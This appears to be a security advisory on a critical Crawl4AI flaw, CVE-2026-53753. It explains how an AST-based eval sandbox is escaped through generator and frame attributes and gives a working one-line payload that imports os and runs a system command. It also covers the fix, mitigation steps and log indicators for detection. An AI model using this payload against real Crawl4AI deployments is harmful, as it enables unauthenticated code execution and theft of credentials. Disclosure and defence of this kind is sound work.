Crawl4AI Critical RCE Sandbox Escape 2026: CVE-2026-53753 (CVSS 9.8) — Pre-Auth RCE via AST Sandbox Escape

Thu, 25 Jun 2026 00:00:00 +0000

Every Crawl4AI instance running version 0.8.6 or earlier with its default configuration is remotely exploitable with zero authentication. A single POST /crawl request carrying a crafted JsonCssExtractionStrategy schema is enough to escape the AST-based expression sandbox and execute arbitrary system commands inside the Docker container — no credentials, no prior access, no user interaction required. CVE-2026-53753 carries a CVSS 9.8 because the attack vector is network-based, the complexity is low, and the impact on confidentiality, integrity, and availability is total. The root cause is a three-line flaw in the _safe_eval_expression() function: an AST validator that only blocks attribute names starting with an underscore, missing Python internals like gi_frame, f_back, and f_builtins that expose the full interpreter to anyone who knows the class hierarchy.

Crawl4AI’s Computed Fields Feature

Crawl4AI is an open-source, LLM-friendly web crawler and scraper — think Firecrawl but self-hosted in Docker. It lets you define extraction schemas that describe how to parse crawled pages. One feature, computed fields, allows users to specify Python expressions that transform extracted data inline. When you define a schema like this:

schema = {
  "name": "MyExtractionStrategy",
  "type": "json-css",
  "params": {
    "computed_fields": {
      "total": "price * quantity"
    }
  }
}

Crawl4AI evaluates the total expression at extraction time using _safe_eval_expression() — a function that parses the expression into an AST, walks the tree, and rejects any node that accesses attributes starting with _. The intent was to prevent access to Python internals like __class__, __subclasses__, and __builtins__, which are the usual building blocks of Python jail escapes.

The approach worked against naive payloads. You couldn’t write ().__class__.__base__.__subclasses__() because __class__ starts with an underscore. But the security model assumed that the only dangerous attributes in Python are the ones that start with __. That assumption was wrong.

The Root Cause: Blocking Underscores Is Not Enough

Here is the actual vulnerable function as it existed in Crawl4AI <= 0.8.6:

# Vulnerable: Crawl4AI <= 0.8.6
_SAFE_EVAL_BUILTINS = ["str", "int", "float", "bool", "len", "abs",
                       "min", "max", "sum", "round", "range", "sorted",
                       "reversed", "enumerate", "zip", "map", "filter",
                       "type", "isinstance", "issubclass", "hasattr",
                       "getattr", "setattr", "dict", "list", "tuple",
                       "set", "frozenset", "True", "False", "None"]

def _safe_eval_expression(expression, context):
    tree = ast.parse(expression, mode="eval")

    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            # Block only underscore-prefixed attributes
            if node.attr.startswith("_"):
                raise ValueError(f"Access to attribute '{node.attr}' is not allowed")
        if isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name):
                if node.func.id not in _SAFE_EVAL_BUILTINS:
                    raise ValueError(f"Call to '{node.func.id}' is not allowed")

    code = compile(tree, "", "eval")
    return eval(code, {"__builtins__": {}}, context)

The AST walker blocks __class__, __subclasses__, __builtins__ — anything with a leading underscore. It then passes an empty __builtins__ dict to eval() as a second layer of defense. Two layers, both relying on the same flawed assumption: that dangerous Python internals always have dunder names.

Python’s generator and frame object attributes tell a different story:

Attribute	Object	Starts with `_`?	What It Exposes
`gi_frame`	generator	No	Current execution frame of a suspended generator
`f_back`	frame	No	Previous frame in the call stack
`f_builtins`	frame	No	The real `__builtins__` dict of that frame

None of these start with an underscore. They pass the AST validator without triggering any check. The eval() call sets __builtins__ to {}, but the frame’s f_builtins contains the original, unrestricted builtins from the caller’s scope.

The Exploit Chain: From Expression to Shell

The exploit requires sending a POST /crawl request with a JsonCssExtractionStrategy that includes a computed field containing a malicious expression. The expression uses a generator to access gi_frame, then walks the frame chain via f_back until it reaches a frame that still has the real f_builtins:

# Simple generator to get a frame object
gen = (lambda: (yield))()
frame = gen.gi_frame

# Walk up the call stack until we find the real __builtins__
while frame:
    if "os" in frame.f_builtins or "__import__" in frame.f_builtins:
        real_builtins = frame.f_builtins
        break
    frame = frame.f_back

# Now we have the real __import__
__import__ = real_builtins["__import__"]
os = __import__("os")
os.system("id")

In practice, this can be compressed into a single expression that fits inside a computed field schema:

(lambda g: g.gi_frame.f_back.f_back.f_back.f_builtins["__import__"]("os").system("id"))((lambda: (yield))())

The exact number of f_back hops depends on the call depth at evaluation time, but the pattern is consistent: create a generator, grab gi_frame, walk f_back until you reach a frame whose f_builtins contains __import__, then import os and execute commands. From there, the attacker can exfiltrate environment variables, read ~/.aws/credentials or the Docker API socket, modify files, or pivot to the host.

The full attack requires no authentication because Crawl4AI’s JWT authentication is disabled by default in all versions prior to 0.8.7. If you deployed Crawl4AI following the default Docker setup and exposed port 11235, your instance has been remotely reachable and exploitable since day one.

I’ve found that this vulnerability is particularly dangerous because Crawl4AI is often deployed by LLM application teams who want to give their agents web-browsing capability. These teams are not security engineers. They run docker run -p 11235:11235 unclecode/crawl4ai:latest, the web crawler works, they move on. The instance sits on a public cloud VM with a wide-open API endpoint serving Python eval() — essentially a remote shell with extra steps.

Hardcoded JWT Secret Compounds the Problem

Even if you did enable JWT authentication by setting CRAWL4AI_API_TOKEN, a separate vulnerability — CVE-2026-56265 (CVSS 9.3) — means the default signing key was hardcoded in the source code. An attacker who knows the default key can forge valid JWTs for any user and bypass authentication entirely. Together, these two CVEs mean that every Crawl4AI instance before 0.8.7 is completely compromised regardless of configuration: either auth is off (CVE-2026-53753 hits the wire directly) or auth is bypassable (CVE-2026-56265 unlocks the same endpoint).

How the Fix Works

Crawl4AI 0.8.7 removes eval() from the computed fields expression path entirely. Here is what changed:

Primary fix: The _safe_eval_expression() function and _SAFE_EVAL_BUILTINS are deleted. Computed field expressions that look like Python code now log a warning and return a default value instead of evaluating. Users who need post-processing must supply a Python callable as the function key in the schema — SDK-only, not available via the JSON API.

Secondary hardening: The hook_manager sandbox — a separate code execution path for plugin hooks — was hardened to strip __builtins__, __loader__, and __spec__ from injected modules. Dangerous builtins like getattr, setattr, type, and __build_class__ were removed from the allowlist.

Tertiary defense: The /config/dump endpoint (another eval() sink) was migrated to JSON input with Pydantic validation, eliminating a secondary injection vector.

The commit that deleted _safe_eval_expression() is straightforward — about 40 lines removed, none replaced with another eval-based approach. This is the right fix. AST sandboxing in Python has a long history of failures: every attempt to implement a “safe eval” by walking the AST tree has eventually been bypassed. The language’s object model is too rich, the frame introspection API too powerful, and the gap between “what the AST walker sees” and “what the interpreter does” too wide. The only correct fix is to not evaluate untrusted expressions at all.

Mitigation Steps

Immediate:

Upgrade to Crawl4AI 0.8.7 or later: pip install crawl4ai>=0.8.7
If using Docker, pull the latest image: docker pull unclecode/crawl4ai:latest
If you cannot upgrade immediately, set CRAWL4AI_API_TOKEN to a strong random value and restrict network access to port 11235 via firewall rules — but note that CVE-2026-56265 means the token alone is not sufficient before 0.8.7.
Audit your Crawl4AI instances for signs of compromise: check access logs for computed field schemas containing gi_frame, f_back, or f_builtins. Run docker logs and grep for ValueError: Access to attribute — legitimate usage rarely triggers that error.

Architectural:

Do not expose Crawl4AI’s API port to the public internet. Place it behind an authenticating reverse proxy (nginx with basic auth, or a Cloudflare Access tunnel).
Run Crawl4AI in an isolated Docker container with minimal capabilities: --cap-drop=ALL, --read-only, no docker.sock mount.
Evaluate whether you need computed fields at all. For most crawling workflows, post-processing extracted data in your application code is safer and more maintainable than inlining Python expressions in JSON schemas.
Monitor for related CVEs: CVE-2026-53754 (SSRF filter bypass via IPv6 transition forms, CVSS 7.5) and CVE-2026-53755 (SSRF via proxy_config manipulation, CVSS 8.6) affect the same release range and indicate a pattern of incomplete input validation in Crawl4AI.

For more on sandbox escape patterns in agent tooling, see the Claude Code SOCKS5 Null-Byte Bypass analysis, which covers a similar parser-differential class in Anthropic’s agent sandbox. The broader context of agent security boundaries is covered in the AI Agent Security Tools Guide.

Why AST Sandboxes Keep Failing

This vulnerability is not Crawl4AI-specific — it is a recurring pattern in Python security. AST-based sandboxing has failed in Pandas (pandas.eval, CVE-2023-50447), smolagents (multiple sandbox escapes in LocalPythonExecutor), and countless CTF pyjail challenges. The fundamental problem is that Python’s runtime does not distinguish between “user code” and “system code” at the object level. A frame’s f_builtins is just a dict. A generator’s gi_frame is just a pointer. There is no protection domain, no capability system, no membrane that controls what code can access what objects. The AST walker is a static analysis pass running against a dynamic language with first-class access to its own runtime — a mismatch that cannot be fixed with more blocklist entries.

Crawl4AI’s maintainers made the correct call in 0.8.7: delete the eval path entirely, accept the feature loss, and tell users to use the SDK if they need computed fields. This is the only strategy that has proven durable in Python sandboxing.

Frequently Asked Questions

Q: Does this vulnerability affect Crawl4AI instances with authentication enabled? A: Yes. Even if you set CRAWL4AI_API_TOKEN, the default JWT signing key is hardcoded (CVE-2026-56265), enabling token forgery. The only fully mitigated configuration before 0.8.7 is one that is both authenticated and network-isolated — and even then, isolation is doing the heavy lifting.

Q: Can I detect if my Crawl4AI instance has been compromised? A: Check access logs for POST /crawl requests with unusually long or complex computed_fields entries. Look for generator syntax (lambda: (yield)), attribute chains (gi_frame, f_back), or string patterns resembling Python code. Also check for outbound connections from the container to unexpected destinations.

Q: Is there a workaround for computed fields after upgrading to 0.8.7? A: The function key in extraction schemas still works, but only through the Python SDK — it is not available via the JSON API. You must use the Crawl4AI SDK client and pass callables directly. The JSON API’s computed field feature is permanently removed in 0.8.7.

Crawl4ai on RockB